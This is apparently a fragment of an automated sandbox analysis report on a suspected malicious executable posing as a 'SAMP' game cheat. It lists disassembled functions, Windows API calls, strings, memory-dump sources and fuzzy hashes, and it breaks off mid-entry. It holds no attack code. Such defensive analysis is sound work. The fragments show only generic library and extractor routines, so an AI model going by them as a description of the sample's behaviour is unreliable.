                                                    • Instruction Fuzzy Hash: BEF05E75810322AFC616EF14FC024A93FB1F726726745050AF814D63B1CF354986EBB5
                                                    Function 00D015FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _swprintf
                                                    • String ID: %ls$%s: %s
                                                    • API String ID: 589789837-2259941744
                                                    • Opcode ID: 27c988c92171328a90d05a02475a09d767ff74f0f39c5aad9b9d0951b47c8b4e
                                                    • Instruction ID: 572f7f8b1a6926dc22e9f44675832da7f17ba7591186ad436a3121b2d125e7ec
                                                    • Opcode Fuzzy Hash: 27c988c92171328a90d05a02475a09d767ff74f0f39c5aad9b9d0951b47c8b4e
                                                    • Instruction Fuzzy Hash: 8A51C83D288708F6F7211A948D46F367665AB05F04F648606F3DF644E2D9E3E510673B
                                                    Function 00D17F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe,00000104), ref: 00D17FAE
                                                    • _free.LIBCMT ref: 00D18079
                                                    • _free.LIBCMT ref: 00D18083
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _free$FileModuleName
                                                    • String ID: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                    • API String ID: 2506810119-2444262678
                                                    • Opcode ID: 487145916eb8546eec0985f11422cc4fca3bb6be4d5f24ea1f7a77631ca905ca
                                                    • Instruction ID: b4a76273eb67df3dbfca2d686bff52a2cb7671738b76bc902f5dd91b1a20703e
                                                    • Opcode Fuzzy Hash: 487145916eb8546eec0985f11422cc4fca3bb6be4d5f24ea1f7a77631ca905ca
                                                    • Instruction Fuzzy Hash: 05318F71A00318BFDB21DF95E8819EEBBB8EF99310B14406AF80497211DE718AC99B71
                                                    Function 00D131D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00D131FB
                                                    • _abort.LIBCMT ref: 00D13306
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer_abort
                                                    • String ID: MOC$RCC
                                                    • API String ID: 948111806-2084237596
                                                    • Opcode ID: e5cb0ebf32b22acb4828027858511feacc36f936b354e0997369b3dc77bc3574
                                                    • Instruction ID: dcca6e73a1ffa2a0e63658d151e86fd19b24b1ca1dece4fa87ed21d0c9975544
                                                    • Opcode Fuzzy Hash: e5cb0ebf32b22acb4828027858511feacc36f936b354e0997369b3dc77bc3574
                                                    • Instruction Fuzzy Hash: 55414C71900209BFCF15EF98ED81AEEBBB5FF48304F188059F91467211DB359A90DB64
                                                    Function 00CF7401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF7406
                                                      • Part of subcall function 00CF3BBA: __EH_prolog.LIBCMT ref: 00CF3BBF
                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00CF74CD
                                                      • Part of subcall function 00CF7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CF7AAB
                                                      • Part of subcall function 00CF7A9C: GetLastError.KERNEL32 ref: 00CF7AF1
                                                      • Part of subcall function 00CF7A9C: CloseHandle.KERNEL32(?), ref: 00CF7B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                    • API String ID: 3813983858-639343689
                                                    • Opcode ID: c80ea72fbe74a52bca6b1bc3d6ee78cad52d628544c5ea194ef72e62bebbab9d
                                                    • Instruction ID: 2731f37d5ab6ceea0c75fefa63d6ca245b3a66623acbeca2a57332e66ee7e28c
                                                    • Opcode Fuzzy Hash: c80ea72fbe74a52bca6b1bc3d6ee78cad52d628544c5ea194ef72e62bebbab9d
                                                    • Instruction Fuzzy Hash: 5131BE71A0435DAADF91ABA4DC45BFE7BB8AF08344F044115FA15E7282CB748A84CB72
                                                    Function 00D0AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • EndDialog.USER32(?,00000001), ref: 00D0AD98
                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00D0ADAD
                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D0ADC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: ASKNEXTVOL
                                                    • API String ID: 445417207-3402441367
                                                    • Opcode ID: 07899cf5b569589b4d46c2b68c619b6cdea817d14c48a2576b7f9f2a481fad6b
                                                    • Instruction ID: 6d81b98805a8349e0fbf155a55591ea0c4a4e4959562364320df9cd74af72b7f
                                                    • Opcode Fuzzy Hash: 07899cf5b569589b4d46c2b68c619b6cdea817d14c48a2576b7f9f2a481fad6b
                                                    • Instruction Fuzzy Hash: A211D032240304AFD3518F6CEC45FBA7B69EB5A743F440000F644EB6E0D7629915A733
                                                    Function 00CFD8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __fprintf_l.LIBCMT ref: 00CFD954
                                                    • _strncpy.LIBCMT ref: 00CFD99A
                                                      • Part of subcall function 00D01DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D31030,00000200,00CFD928,00000000,?,00000050,00D31030), ref: 00D01DC4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                    • String ID: $%s$@%s
                                                    • API String ID: 562999700-834177443
                                                    • Opcode ID: 90e9d90b3103cb3a6c83fce7adefa1ee7e36deb1b6f9eff42740b795ef87cc8e
                                                    • Instruction ID: 184b09f4118af3058ceac1692999343a5fe600cef8f566c63a5e5ecb104792e1
                                                    • Opcode Fuzzy Hash: 90e9d90b3103cb3a6c83fce7adefa1ee7e36deb1b6f9eff42740b795ef87cc8e
                                                    • Instruction Fuzzy Hash: 8921A83244024CAEDF61EFA4DC05FFE7BA9EF05704F044422FA2596192E672D748CB62
                                                    Function 00D00E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00CFAC5A,00000008,?,00000000,?,00CFD22D,?,00000000), ref: 00D00E85
                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00CFAC5A,00000008,?,00000000,?,00CFD22D,?,00000000), ref: 00D00E8F
                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00CFAC5A,00000008,?,00000000,?,00CFD22D,?,00000000), ref: 00D00E9F
                                                    Strings
                                                    • Thread pool initialization failed., xrefs: 00D00EB7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                    • String ID: Thread pool initialization failed.
                                                    • API String ID: 3340455307-2182114853
                                                    • Opcode ID: f98a78376f907da80885942c8db2aa5014eef6331a11f0f7d9e017279d35f546
                                                    • Instruction ID: f6e733685cc019f70090f95373f67d937aa8e398afe114d8562a98e47d0e47c6
                                                    • Opcode Fuzzy Hash: f98a78376f907da80885942c8db2aa5014eef6331a11f0f7d9e017279d35f546
                                                    • Instruction Fuzzy Hash: 87118FB1644708AFC3315F6ADC84BA7FBECEB64784F14482EF1DAD2240DA7199418B70
                                                    Function 00D0B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • EndDialog.USER32(?,00000001), ref: 00D0B2BE
                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D0B2D6
                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D0B304
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: GETPASSWORD1
                                                    • API String ID: 445417207-3292211884
                                                    • Opcode ID: 26f7b209256b769c7472e2e93a8f206afe8c31632980ea8f37a9140c0a4c8c90
                                                    • Instruction ID: 4dbaf76ca36709273ef98f422a8b079c3489b15a22b3513d926fe911f1a0f082
                                                    • Opcode Fuzzy Hash: 26f7b209256b769c7472e2e93a8f206afe8c31632980ea8f37a9140c0a4c8c90
                                                    • Instruction Fuzzy Hash: E111E132904318BADB219A74AC59FFF3B6CEF19760F140022FA89F21D0C7A0DA059771
                                                    Function 00D0DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                    • API String ID: 0-56093855
                                                    • Opcode ID: 3fe7089ad31661105c4f1b334199d33bc6337af589ae88458312f0216198cffa
                                                    • Instruction ID: ef0f18b44756a11269142ab9c072a7914bc2515d501041cd3ca0e399ec22c915
                                                    • Opcode Fuzzy Hash: 3fe7089ad31661105c4f1b334199d33bc6337af589ae88458312f0216198cffa
                                                    • Instruction Fuzzy Hash: B001717A604345AFD7118FA8FC44B5A7FAAF749395B04042AF849C37B0C631D850EBB0
                                                    Function 00D19A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                    • Instruction ID: 2d0100dd17c13937799cff4a07c6e677bf21a34d43f59b9eb98a71f06873ab62
                                                    • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                                    • Instruction Fuzzy Hash: 9CA12771904286AFD7118F58E8B17EEFBE6EF55310F18416DE4859B281CA3499C1C7B0
                                                    Function 00CFA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CF7F69,?,?,?), ref: 00CFA3FA
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CF7F69,?), ref: 00CFA43E
                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CF7F69,?,?,?,?,?,?,?), ref: 00CFA4BF
                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00CF7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CFA4C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$Create$CloseHandleTime
                                                    • String ID:
                                                    • API String ID: 2287278272-0
                                                    • Opcode ID: 4ccbe8361a4792bdcd2f64e32232cf8bd95425a0f746ddbdd359977b9562149c
                                                    • Instruction ID: 7ca14b43da9af165d1243ee0bcb4cf94e0a4a1f76d78fdaf2ab65d1f60f1f723
                                                    • Opcode Fuzzy Hash: 4ccbe8361a4792bdcd2f64e32232cf8bd95425a0f746ddbdd359977b9562149c
                                                    • Instruction Fuzzy Hash: 6E41AEB12483899AD731DF24DC45BEEFBE49B84300F044919B6E9D3190D6A4DB4C9B63
                                                    Function 00CF1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID:
                                                    • API String ID: 176396367-0
                                                    • Opcode ID: 837ca0338a8970060fd96547e5d5e1bcf53a575800fa4aed706a6fd6d927ad29
                                                    • Instruction ID: a4058e821d965f454f6b97132ba41ba6bb6c3ce6e2e067378169b15b001ca13b
                                                    • Opcode Fuzzy Hash: 837ca0338a8970060fd96547e5d5e1bcf53a575800fa4aed706a6fd6d927ad29
                                                    • Instruction Fuzzy Hash: C341C37190076A9BCB659FA88C49AEF7BB8EF01351F044019FD45F7281DF30AE498AB1
                                                    Function 00D1C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D191E0,?,00000000,?,00000001,?,?,00000001,00D191E0,?), ref: 00D1C9D5
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D1CA5E
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D16CBE,?), ref: 00D1CA70
                                                    • __freea.LIBCMT ref: 00D1CA79
                                                      • Part of subcall function 00D18E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D1CA2C,00000000,?,00D16CBE,?,00000008,?,00D191E0,?,?,?), ref: 00D18E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID:
                                                    • API String ID: 2652629310-0
                                                    • Opcode ID: fded36a9575a33ad893cd401063e106c3854fa6e59a15a90a6981c8b18b3bda7
                                                    • Instruction ID: a3e53bd1b0008e432c3fcbf3665246759e6ec41040850f3ab262b52128470f5d
                                                    • Opcode Fuzzy Hash: fded36a9575a33ad893cd401063e106c3854fa6e59a15a90a6981c8b18b3bda7
                                                    • Instruction Fuzzy Hash: A031A072A1021ABBDB25DF64EC41EEE7BA5EF41310B184168FC04E6250EB35CD91CBB0
                                                    Function 00D0A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00D0A666
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D0A675
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D0A683
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00D0A691
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 53000067290c8ca9cea962a0aea7e845556af7644b7afb4fc2315fe5a37cc7c4
                                                    • Instruction ID: c4d808f56cae59f6c449dd56eb6b7d23e6fc5f45d9883d225e03107aca85a6a3
                                                    • Opcode Fuzzy Hash: 53000067290c8ca9cea962a0aea7e845556af7644b7afb4fc2315fe5a37cc7c4
                                                    • Instruction Fuzzy Hash: 3BE01231952B21B7D3615F68BC0DB8B3E68AB05BA3F050101FE05D63D0DBB486008BB1
                                                    Function 00D0A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00D0A699: GetDC.USER32(00000000), ref: 00D0A69D
                                                      • Part of subcall function 00D0A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D0A6A8
                                                      • Part of subcall function 00D0A699: ReleaseDC.USER32(00000000,00000000), ref: 00D0A6B3
                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00D0A83C
                                                      • Part of subcall function 00D0AAC9: GetDC.USER32(00000000), ref: 00D0AAD2
                                                      • Part of subcall function 00D0AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00D0AB01
                                                      • Part of subcall function 00D0AAC9: ReleaseDC.USER32(00000000,?), ref: 00D0AB99
                                                    Strings
                                                    Memory Dump Source
